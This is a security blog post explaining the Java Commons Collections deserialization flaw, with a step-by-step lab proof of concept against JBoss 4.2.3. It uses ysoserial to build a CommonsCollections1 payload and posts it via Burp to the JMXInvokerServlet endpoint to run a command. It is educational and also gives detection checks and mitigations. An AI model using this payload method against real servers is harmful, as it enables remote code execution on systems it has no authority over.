NEW FEATURE
Cobalt PtaaS + DAST combines manual pentests and automated scanning for comprehensive applications security.
NEW FEATURE
Cobalt PtaaS + DAST combines manual pentests and automated scanning for comprehensive applications security.

The Forgotten Unserialization Vulnerability

There’re lots of vulnerabilities out there, but I think the most important one has been forgotten. Compared to Imagetragick, the “Unserialize vulnerability” got forgotten as fast as it was published. On November, 6th 2015, I first read about it when foxglovesecurity published research they had done, and since then I heard about a real attack on Paypal servers.

In this blog post, I’ll focus on Java and I’ll use JBoss application server on my demo. JBoss is an application server that contains many containers such as, WEB Container, EE/EJB Container, etc. It’s a web container based on a Tomcat server, but its completely different from Tomcat, read more about JBoss.

What’s serialization and deserialization

Serialization is about streaming data to disk or over the network, so if you send a request, then the process of converting will do serialization, and when the process read the data back it will do deserialization. Class ObjectInputStream and class ObjectOutputStream both handle serialization and deserialization. Example:

public static Object deserialize(String fileName) throws IOException, ClassNotFoundException { FileInputStream fis = new FileInputStream(fileName); BufferedInputStream bis = new BufferedInputStream(fis); ObjectInputStream ois = new ObjectInputStream(bis); Object obj = ois.readObject(); ois.close(); return obj; } public static void serialize(Object obj, String fileName) throws IOException { FileOutputStream fos = new FileOutputStream(fileName); BufferedOutputStream bos = new BufferedOutputStream(fos); ObjectOutputStream oos = new ObjectOutputStream(bos); oos.writeObject(obj); oos.close(); }

Am I vulnerable too?

Simple check will show you if you vulnerable or not:

~/jboss-4.2.3.GA# grep -R InvokerTransformer .

Well results:

Binaryfile./server/all/lib/commons-collections.jarmatches Binaryfile./server/default/lib/commons-collections.jarmatches

Also, you should run the same command on your development environment and see if you’re using common or not. (95% you are :)).

How to detect Java serialized object

Here’s an example of raw byte data of a serialization Java object: AC ED 00 05 73 72 00 0A 53 65 72 69 61 6C 54 65 73 74 05 52 81 5A AC 66 02 F6 02 00 02 49 00 07 As you can see I emphasis AC ED 00 05 which points out that this is a Java serialized object (Sometimes you’ll see Java classes in the request like artsploit finding).

How to exploit it, PoC example (Ubuntu-Jboss)

First, you need to download Jboss 4.2.3. Second, you need to download ysoserial’s tool, which helps us to generate unsafe object deserialization.

After Jboss download run the following command:

Unzip JBoss

unzip jboss-4.2.3.GA.zip

Detect your local ip

ifconfig and copy the private it, e.g. 192.168.231.132

Start Jboss

./run.sh -b 192.168.231.132

Verify Jboss has started

[Server] JBoss (MX MicroKernel) [4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)] Started in 5s:467ms

Clone ysoserial’s tool with git

git command

git clone [https://github.com/frohoff/ysoserial.git](https://github.com/frohoff/ysoserial.git)

Compile and build ysoserial

mvn clean install

Create our payload.

~/ysoserial $ java -jar target/ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 'touch /tmp/RCE_vuln.txt' > payload.out

Run burp-suite and make capture the request and send it to repeater

http://192.168.231.132:8080/invoker/JMXInvokerServlet

Upload the payload to burp suite — repeater

On repeater change the GET to POST, **then** right click and upload the payload from a file

Check the machine where Jboss installed

ls /tmp/ and you'll see RCE_vuln.txt

Conclusion

As you can see, you need to verify that the website is vulnerable to common-collection and then you should act and create payload. The following image present the state on my machine after the attack succeeded.

forgottenVulnerability_2-1
Burp-suite and server side.

Mitigations

Any application server should upgrade the commons-collections. E.g. Collections-580 or JBoss

References

  1. https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#background

  2. https://access.redhat.com/solutions/2045023

  3. https://github.com/frohoff/ysoserial

  4. https://www.paypal-engineering.com/2016/01/21/lessons-learned-from-the-java-deserialization-bug/

  5. https://en.wikipedia.org/wiki/Web_container

  6. http://docs.oracle.com/javaee/6/tutorial/doc/bnabo.html

  7. https://en.wikipedia.org/wiki/JBoss_Enterprise_Application_Platform

  8. https://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip/download

  9. https://issues.apache.org/jira/browse/COLLECTIONS-580

  10. https://access.redhat.com/solutions/2045023

Back to Blog
About Sasi Levi
Sasi Levi works as a senior cybersecurity researcher at Salt Security. Through his time in the cybersecurity sector, Sasi helped companies such as ConteXtream and Magic Leap develop and secure their applications. More By Sasi Levi
Azure AD: Pentesting Fundamentals
Core member Orhan Yildirim walks us through how to use Azure AD when pentesting.
Blog
May 23, 2022